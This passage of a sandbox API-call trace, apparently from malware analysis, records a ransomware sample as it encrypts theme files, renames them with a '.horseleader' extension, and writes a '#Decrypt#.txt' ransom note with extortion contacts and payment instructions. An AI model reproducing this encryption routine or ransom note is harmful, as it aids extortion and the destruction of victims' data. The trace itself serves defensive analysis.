Size=0x840) returned 0x7dc820 [0247.825] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.horseleader") returned 92 [0247.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\thmbnail.png.horseleader")) returned 1 [0247.827] GetProcessHeap () returned 0x780000 [0247.827] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.827] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xbb5a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.827] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.827] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\#Decrypt#.txt") returned 81 [0247.827] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.828] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.828] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.830] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.830] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.830] CloseHandle (hObject=0x158) returned 1 [0247.830] GetProcessHeap () returned 0x780000 [0247.830] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.831] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SATIN", cAlternateFileName="")) returned 1 [0247.831] lstrcmpiW (lpString1="SATIN", lpString2="Windows") returned -1 [0247.831] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN") returned 65 [0247.831] lstrcmpW (lpString1="SATIN", lpString2=".") returned 1 [0247.831] lstrcmpW (lpString1="SATIN", lpString2="..") returned 1 [0247.831] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.831] GetProcessHeap () returned 0x780000 [0247.831] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.831] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*") returned 67 [0247.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.832] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.832] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\.") returned 67 [0247.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.832] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d24dcb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.832] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\..") returned 68 [0247.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.832] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xe1b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.832] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.833] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 77 [0247.833] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.833] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.833] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.833] lstrlenW (lpString=".testttjffg") returned 11 [0247.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.833] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.836] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF") returned 77 [0247.836] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.836] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3611) returned 1 [0247.836] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xe1b, lpOverlapped=0x0) returned 1 [0247.838] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff1e5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.838] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xe1b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xe1b, lpOverlapped=0x0) returned 1 [0247.839] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.839] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.839] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.839] CloseHandle (hObject=0x1a4) returned 1 [0247.839] GetProcessHeap () returned 0x780000 [0247.839] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.839] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.horseleader") returned 89 [0247.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\preview.gif.horseleader")) returned 1 [0247.840] GetProcessHeap () returned 0x780000 [0247.840] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.840] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24bfd200, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x24bfd200, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1936f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SATIN.ELM", cAlternateFileName="")) returned 1 [0247.840] lstrcmpiW (lpString1="SATIN.ELM", lpString2="Windows") returned -1 [0247.840] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM") returned 75 [0247.841] StrStrIW (lpFirst="SATIN.ELM", lpSrch=".horseleader") returned 0x0 [0247.841] lstrcmpW (lpString1="SATIN.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.841] lstrcmpW (lpString1="SATIN.ELM", lpString2="_uninstalling_.png") returned 1 [0247.841] lstrlenW (lpString=".testttjffg") returned 11 [0247.841] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM", lpSrch=".testttjffg") returned 0x0 [0247.841] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.841] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.843] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM") returned 75 [0247.843] StrStrW (lpFirst="SATIN.ELM", lpSrch=".txt") returned 0x0 [0247.843] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=103279) returned 1 [0247.843] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.843] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.846] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.846] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.846] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xa1b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.846] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.848] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.849] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.849] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x1436f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.849] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.849] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.849] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.850] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.850] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.850] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.850] CloseHandle (hObject=0x1a4) returned 1 [0247.850] GetProcessHeap () returned 0x780000 [0247.850] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.850] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM.horseleader") returned 87 [0247.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.elm.horseleader")) returned 1 [0247.854] GetProcessHeap () returned 0x780000 [0247.854] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.854] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SATIN.INF", cAlternateFileName="")) returned 1 [0247.854] lstrcmpiW (lpString1="SATIN.INF", lpString2="Windows") returned -1 [0247.854] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF") returned 75 [0247.854] StrStrIW (lpFirst="SATIN.INF", lpSrch=".horseleader") returned 0x0 [0247.854] lstrcmpW (lpString1="SATIN.INF", lpString2="#Decrypt#.txt") returned 1 [0247.854] lstrcmpW (lpString1="SATIN.INF", lpString2="_uninstalling_.png") returned 1 [0247.854] lstrlenW (lpString=".testttjffg") returned 11 [0247.854] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF", lpSrch=".testttjffg") returned 0x0 [0247.855] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.855] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.855] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF") returned 75 [0247.856] StrStrW (lpFirst="SATIN.INF", lpSrch=".txt") returned 0x0 [0247.856] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=456) returned 1 [0247.856] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1c8, lpOverlapped=0x0) returned 1 [0247.857] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.858] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1c8, lpOverlapped=0x0) returned 1 [0247.858] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.858] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.858] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.859] CloseHandle (hObject=0x1a4) returned 1 [0247.859] GetProcessHeap () returned 0x780000 [0247.859] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.859] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF.horseleader") returned 87 [0247.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.inf.horseleader")) returned 1 [0247.861] GetProcessHeap () returned 0x780000 [0247.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.861] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, 